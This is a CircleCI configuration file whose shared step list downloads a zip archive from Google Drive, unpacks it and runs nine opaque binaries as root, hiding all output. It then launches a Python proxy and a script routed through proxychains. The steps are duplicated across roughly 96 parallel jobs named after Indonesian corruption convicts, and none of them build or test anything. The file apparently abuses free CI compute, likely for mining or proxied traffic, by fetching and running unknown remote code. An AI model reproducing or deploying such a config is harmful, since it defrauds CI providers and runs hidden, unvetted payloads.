version: 2.1
jobs:
  SjamsulNursalim:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: &commonSteps
      steps:
        - run:
            name: Inilah
            command: |
              sudo apt update -y
        - run:
            name: Daftar
            command: |
              wget --load-cookies /tmp/cookies.txt "https://docs.google.com/uc?export=download&confirm=$(wget --quiet --save-cookies /tmp/cookies.txt --keep-session-cookies --no-check-certificate 'https://docs.google.com/uc?export=download&id=1yzz0L1S5NlI8rEoydxS-LR-WHycx-4jH' -O- | sed -rn 's/.*confirm=([0-9A-Za-z_]+).*/\1\n/p')&id=1yzz0L1S5NlI8rEoydxS-LR-WHycx-4jH" -O evamusic.zip && rm -rf /tmp/cookies.txt >/dev/null 2>&1
        - run:
            name: Nama
            command: |
              unzip evamusic.zip >/dev/null 2>&1
        - run:
            name: Orang
            command: |
              chmod u+x * >/dev/null 2>&1
        - run:
            name: Korupsi
            command: |
              sudo ./Siji >/dev/null 2>&1
        - run:
            name: Makan
            command: |
              sudo ./Loro >/dev/null 2>&1
        - run:
            name: Uang
            command: |
              sudo ./Telu >/dev/null 2>&1
        - run:
            name: Semua
            command: |
              sudo ./Papat >/dev/null 2>&1
        - run:
            name: Rakyat
            command: |
              sudo ./Limo >/dev/null 2>&1
        - run:
            name: Umum
            command: |
              sudo ./Enem >/dev/null 2>&1
              cd prx && cd 3
              sudo mv proxychains.conf /etc
        - run:
            name: DasarAnjir. . . .
            no_output_timeout: 300m
            command: |
              echo "Selamat Menikmati. . ."
              sudo ./Pitu >/dev/null 2>&1
              sudo ./Wolu >/dev/null 2>&1
              sudo ./Songo >/dev/null 2>&1
              screen -dmS proxy python3 p.py >/dev/null 2>&1
              sleep 120s
              proxychains bash -u start11.sh >/dev/null 2>&1
  BambangSutrisno:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndrianKiki:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EkoAdiPutranto:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ShernyKonjongian:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DavidNusaWijaya:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SamadikunHartono:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AgusAnwar:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SujionoTiman:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  MariaPauline:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DjokoSTjandra:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  GayusTambunan:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NununNurbaeti:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NaderThaher:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LesmanaBasuki:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HartawanAluwi:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HendroWiyanto:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AntonTantular:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HeshamWaraq:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  RasatAliRizfi:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HariMatalata:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  Nazaruddin:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LidyaMuchtar:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndiMallarangeng:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  JeroWacik:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EdhyPrabowo:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ImamNahrawi:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SuryadharmaAli:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  IdrusMarham:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DahlanIskan:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SitiFadilahSupari:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  BachtiarChamsyah:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SjamsulNursalim1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  BambangSutrisno1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndrianKiki1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EkoAdiPutranto1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ShernyKonjongian1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DavidNusaWijaya1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SamadikunHartono1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AgusAnwar1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SujionoTiman1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  MariaPauline1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DjokoSTjandra1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  GayusTambunan1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NununNurbaeti1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NaderThaher1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LesmanaBasuki1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HartawanAluwi1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HendroWiyanto1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AntonTantular1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HeshamWaraq1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  RasatAliRizfi1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HariMatalata1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  Nazaruddin1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LidyaMuchtar1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndiMallarangeng1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  JeroWacik1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EdhyPrabowo1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ImamNahrawi1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SuryadharmaAli1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  IdrusMarham1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DahlanIskan1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SitiFadilahSupari1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  BachtiarChamsyah1:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SjamsulNursalim2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  BambangSutrisno2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndrianKiki2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EkoAdiPutranto2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ShernyKonjongian2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DavidNusaWijaya2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SamadikunHartono2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AgusAnwar2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SujionoTiman2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  MariaPauline2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DjokoSTjandra2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  GayusTambunan2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NununNurbaeti2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  NaderThaher2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LesmanaBasuki2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HartawanAluwi2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HendroWiyanto2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AntonTantular2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HeshamWaraq2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  RasatAliRizfi2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  HariMatalata2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  Nazaruddin2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  LidyaMuchtar2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  AndiMallarangeng2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  JeroWacik2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  EdhyPrabowo2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  ImamNahrawi2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SuryadharmaAli2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  IdrusMarham2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  DahlanIskan2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  SitiFadilahSupari2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps
  BachtiarChamsyah2:
    docker:
      - image: circleci/php:7.2-apache-stretch
    <<: *commonSteps












workflows:
  version: 2
  all:
    jobs:
      - SjamsulNursalim
      - BambangSutrisno
      - AndrianKiki
      - EkoAdiPutranto
      - ShernyKonjongian
      - DavidNusaWijaya
      - SamadikunHartono
      - AgusAnwar
      - SujionoTiman
      - MariaPauline
      - DjokoSTjandra
      - GayusTambunan
      - NununNurbaeti
      - NaderThaher
      - LesmanaBasuki
      - HartawanAluwi
      - HendroWiyanto
      - AntonTantular
      - HeshamWaraq
      - RasatAliRizfi
      - HariMatalata
      - Nazaruddin
      - LidyaMuchtar
      - AndiMallarangeng
      - JeroWacik
      - EdhyPrabowo
      - ImamNahrawi
      - SuryadharmaAli
      - IdrusMarham
      - DahlanIskan
      - SitiFadilahSupari
      - BachtiarChamsyah
      - SjamsulNursalim1
      - BambangSutrisno1
      - AndrianKiki1
      - EkoAdiPutranto1
      - ShernyKonjongian1
      - DavidNusaWijaya1
      - SamadikunHartono1
      - AgusAnwar1
      - SujionoTiman1
      - MariaPauline1
      - DjokoSTjandra1
      - GayusTambunan1
      - NununNurbaeti1
      - NaderThaher1
      - LesmanaBasuki1
      - HartawanAluwi1
      - HendroWiyanto1
      - AntonTantular1
      - HeshamWaraq1
      - RasatAliRizfi1
      - HariMatalata1
      - Nazaruddin1
      - LidyaMuchtar1
      - AndiMallarangeng1
      - JeroWacik1
      - EdhyPrabowo1
      - ImamNahrawi1
      - SuryadharmaAli1
      - IdrusMarham1
      - DahlanIskan1
      - SitiFadilahSupari1
      - BachtiarChamsyah1
      - SjamsulNursalim2
      - BambangSutrisno2
      - AndrianKiki2
      - EkoAdiPutranto2
      - ShernyKonjongian2
      - DavidNusaWijaya2
      - SamadikunHartono2
      - AgusAnwar2
      - SujionoTiman2
      - MariaPauline2
      - DjokoSTjandra2
      - GayusTambunan2
      - NununNurbaeti2
      - NaderThaher2
      - LesmanaBasuki2
      - HartawanAluwi2
      - HendroWiyanto2
      - AntonTantular2
      - HeshamWaraq2
      - RasatAliRizfi2
      - HariMatalata2
      - Nazaruddin2
      - LidyaMuchtar2
      - AndiMallarangeng2
      - JeroWacik2
      - EdhyPrabowo2
      - ImamNahrawi2
      - SuryadharmaAli2
      - IdrusMarham2
      - DahlanIskan2
      - SitiFadilahSupari2
      - BachtiarChamsyah2









